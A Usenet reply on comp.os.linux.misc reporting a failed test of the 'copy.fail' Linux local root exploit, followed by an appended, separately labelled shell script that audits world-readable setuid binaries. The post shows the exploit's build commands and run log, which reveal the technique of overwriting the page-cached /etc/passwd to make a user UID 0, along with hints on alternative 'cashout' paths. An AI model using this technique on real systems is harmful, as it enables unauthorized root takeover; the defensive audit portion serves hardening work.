| From | jayjwa <jayjwa@atr2.ath.cx.invalid> |
|---|---|
| Newsgroups | comp.os.linux.misc |
| Subject | Re: copy.fail |
| Date | 2026-04-30 11:25 -0400 |
| Organization | atr2net 2026 |
| Message-ID | <87lde4tqpy.fsf@atr2.ath.cx> |
| References | <eli$2604300130@qaz.wtf> |
Eli the Bearded <*@eli.users.panix.com> writes:
> This is an instant local escalation to root that works on about nine
> years of kernel versions across many, if not all, distros. It's been
> patched, very recently, and there is a work-around.
I haven't been able to find a *clear* list of kernels that aren't
affected but it doesn't work on Slackware w/6.18.23. /bin/su needs to be
readable, but it's 4711 by default. Neither the C version nor the Python
version worked here. Some say 6.18 is already patched, but, again, no
clear list as of this writing.
```text
make
cc -nostdlib -static -Os -s -ffreestanding -fno-asynchronous-unwind-tables -fno-ident -fno-stack-protector -Inolibc
-Wl,-N -Wl,-z,max-page-size=0x10 payload.c -o payload
/usr/bin/ld.bfd: warning: payload has a LOAD segment with RWX permissions
ld -r -b binary -o payload.o payload
cc -O2 -Wall -Wextra -Wl,-z,noexecstack -static -o exploit exploit.c payload.o
cc -O2 -Wall -Wextra -Wl,-z,noexecstack -static -o exploit-passwd exploit-passwd.c
/usr/bin/ld.bfd: /tmp/ccTwn0ob.o: in function `main':
exploit-passwd.c:(.text.startup+0x12): warning: Using 'getpwuid' in
statically linked applications requires at runtime the shared libraries from the glibc version used for linking
./exploit /bin/su
open(/bin/su): Permission denied
./exploit-passwd
[+] user: jayjwa (uid=1000)
[+] /etc/passwd UID field at offset 2324
[+] sanity check ok: bytes at offset are "1000"
[+] /etc/passwd page cache mutated; jayjwa's UID is now 0000
[+] attempting cashout via `su jayjwa`
[!] If su fails with "Cannot determine your user name"
(shadow-utils' caller-identity check), the page cache
mutation is still active. Pivot to another cashout
that consults /etc/passwd.
[+] cleanup after testing (run as root):
echo 3 > /proc/sys/vm/drop_caches
Password:
su: Authentication failure
```
--
PGP Key ID: 781C A3E2 C6ED 70A6 B356 7AF5 B510 542E D460 5CAE
"The Internet should always be the Wild West!"
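The post above notes that the first stage failed because Slackware ships /bin/su as 4711, so it is not readable by other users. The script below is an added example (not from the post, and not part of the exploit or any distro's tooling): it audits a directory tree for setuid/setgid executables that are still world-readable, so an administrator can review which binaries would not benefit from that same read restriction. It assumes GNU find(1) and GNU coreutils stat(1); the script name in the usage line is hypothetical.

```sh
#!/bin/sh
# Added example, not from the post: audit setuid/setgid executables that
# grant read access to "other". Slackware's 4711 /bin/su in the post is the
# hardened shape; 4755 is the common default this script reports.
# Assumes GNU find(1) and GNU coreutils stat(1) (-c '%a').

# mode_world_readable MODE
#   MODE is an octal mode string such as 4711 or 4755.
#   Exit status 0 if the "other" triplet includes the read bit.
mode_world_readable() {
    last=${1#"${1%?}"}            # last octal digit = "other" permissions
    [ $(( last & 4 )) -ne 0 ]
}

# file_mode PATH -> octal mode as printed by stat (e.g. 4711)
file_mode() {
    stat -c '%a' "$1"
}

# scan_setuid DIR
#   Prints "MODE PATH" for every regular file under DIR that is setuid or
#   setgid and readable by other. Files such as a 4711 su are not listed;
#   they already satisfy the restriction the post describes.
scan_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -perm -4 -print 2>/dev/null |
    while IFS= read -r f; do
        printf '%s %s\n' "$(file_mode "$f")" "$f"
    done
}

# count_readable_setuid DIR -> number of files scan_setuid reports
count_readable_setuid() {
    scan_setuid "$1" | wc -l | tr -d ' '
}

# Usage: ./audit-setuid.sh /usr/bin   (hypothetical name; no output means clean)
if [ -n "${1:-}" ]; then
    scan_setuid "$1"
fi
```

Removing o+r from a setuid binary is only one mitigation layer; the drop_caches cleanup in the post shows why the kernel fix itself still matters.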